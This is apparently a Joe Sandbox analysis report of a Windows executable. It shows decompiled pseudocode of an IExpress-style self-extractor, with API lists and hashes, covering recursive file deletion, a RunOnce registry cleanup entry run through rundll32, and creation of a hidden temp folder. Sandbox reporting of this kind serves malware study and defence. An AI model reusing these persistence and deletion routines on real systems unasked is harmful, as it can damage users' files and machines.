                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E00A616B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E00A6658A( &_v280, 0x104, 0xa61140);
                                                                                                                                                                                                      								E00A62390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      0x00a62407
                                                                                                                                                                                                      0x00a62407
                                                                                                                                                                                                      0x00a62408
                                                                                                                                                                                                      0x00a62411
                                                                                                                                                                                                      0x00a6241f
                                                                                                                                                                                                      0x00a6247a
                                                                                                                                                                                                      0x00a62483
                                                                                                                                                                                                      0x00a62495
                                                                                                                                                                                                      0x00a624a3
                                                                                                                                                                                                      0x00a62421
                                                                                                                                                                                                      0x00a6242f
                                                                                                                                                                                                      0x00a62453
                                                                                                                                                                                                      0x00a6245d
                                                                                                                                                                                                      0x00a62466
                                                                                                                                                                                                      0x00a62472
                                                                                                                                                                                                      0x00a62472
                                                                                                                                                                                                      0x00a6242f
                                                                                                                                                                                                      0x00a624af
                                                                                                                                                                                                      0x00a624b5
                                                                                                                                                                                                      0x00a624be
                                                                                                                                                                                                      0x00a624c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a624c5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,00A68A3A,00A611F4,00A68A3A,00000000,?,?), ref: 00A623F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00A611F8), ref: 00A62427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00A611FC), ref: 00A6243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A62495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00A624A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A624AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00A624BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(00A68A3A), ref: 00A624C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 10cb9dfa1cd0a4eca3f681793a2c0cee47c6eaaceae01766d667c217d4d5d70c
                                                                                                                                                                                                      • Instruction ID: b909b807b5a3974c3f0821c5dcd6e9583e1aa180cf6ff8b9bec59a02a4c85204
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10cb9dfa1cd0a4eca3f681793a2c0cee47c6eaaceae01766d667c217d4d5d70c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A31A131604A40ABC320EBA4CD8DBEB77FCABD5305F084A2DF55586290EF74990DCB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E00A62BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xa6a288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xa69124 = 0;
                                                                                                                                                                                                      				if(E00A62CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E00A62F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E00A652B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xa68a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xa69a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E00A61F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xa68588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xa69124; // 0x0
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a62c95
                                                                                                                                                                                                      0x00a62c98
                                                                                                                                                                                                      0x00a62c98
                                                                                                                                                                                                      0x00a62c9e
                                                                                                                                                                                                      0x00a62ca7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A62C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
• Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: 01e6a5b5128f7659fd012e095ef13263cbcdb5e4cb10e690e0fbea47e43a7959
                                                                                                                                                                                                      • Instruction ID: 8bca00ba0ff9cdc6a436a825489ba973dc4b32dcc75f2a406fb0857e02e92740
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01e6a5b5128f7659fd012e095ef13263cbcdb5e4cb10e690e0fbea47e43a7959
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB110871600B056BDB20EBF5AD98B6F3B7DAB94795B090125F901F3250DAB4DC43CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A66F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E00A66EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A66F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
• Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 95bbd11f3d64443c4451021d70676a384bd960a8ec1123c2e76203fa261bad21
                                                                                                                                                                                                      • Instruction ID: 538cdab74f337702a4d32dd8df23ece228fb6a896263f88d86f2c87abceb1c6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95bbd11f3d64443c4451021d70676a384bd960a8ec1123c2e76203fa261bad21
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 329002642511005797115BB09D1941575B16A5EA02B815960E011D4494DBB190415952
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A6202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E00A66CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00A6171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E00A6658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xa69a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xa691e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa691e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0xa68580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      							E00A6171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E00A6658A( &_v268, 0x104, 0xa61140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0xa68530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}


































                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62050
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A6205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A6208C
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A620C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A620EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A62134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A6215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A6218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A621C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A621E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A6223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 178549006-3388056274
                                                                                                                                                                                                      • Opcode ID: 6118055c4c679f9f7fa8765194e850c4c869d8b85938e0da8b37b8831b75b525
                                                                                                                                                                                                      • Instruction ID: 8a510699160e485662bd789507f968eb3d6de794db8495b5347fa2a386de9243
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6118055c4c679f9f7fa8765194e850c4c869d8b85938e0da8b37b8831b75b525
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E512771A00214BBDB20DBA0DC49FFB7B3CEB55700F0546A8FA45E7191EAB59E468F50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph
                                                                                                                                                                                                      [Figure: control-flow graph for the function at 00A655A0; legend: Executed / Not Executed]
                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00A655A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E00A6468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E00A6468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0xa69a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0xa68b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0xa68a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E00A66517(_t82, 0x7d2, 0, E00A63210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xa69a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0xa691e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0xa691e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00A61781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00A66952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00A6597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00A62630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00A6658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xa691e4;
																					E00A61781(0xa691e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00A65467(0xa691e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00A62630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00A6597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
